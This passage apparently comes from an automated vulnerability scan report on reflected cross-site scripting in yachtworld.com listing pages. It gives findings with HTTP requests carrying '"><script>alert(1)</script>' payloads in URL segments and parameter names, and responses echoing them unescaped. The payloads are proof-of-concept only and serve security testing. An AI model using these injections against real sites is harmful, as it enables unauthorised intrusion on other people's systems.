nited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:28 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:28 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/VAa142d"><script>alert(1)</script>12c59d7a8be/United-States&boat_id=2305173">
...[SNIP]...

3.95. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a67c"><script>alert(1)</script>266250d89b2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States7a67c"><script>alert(1)</script>266250d89b2 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:55 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:55 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States7a67c"><script>alert(1)</script>266250d89b2&boat_id=2305173">
...[SNIP]...

3.96. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 138a0"><script>alert(1)</script>a5a2c4dcb2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States?138a0"><script>alert(1)</script>a5a2c4dcb2d=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:18 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:17 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&138a0"><script>alert(1)</script>a5a2c4dcb2d=1&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States&boat_id=2305173">
...[SNIP]...

3.97. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7c2f"><script>alert(1)</script>22176e24a46 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmingtone7c2f"><script>alert(1)</script>22176e24a46/NC/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
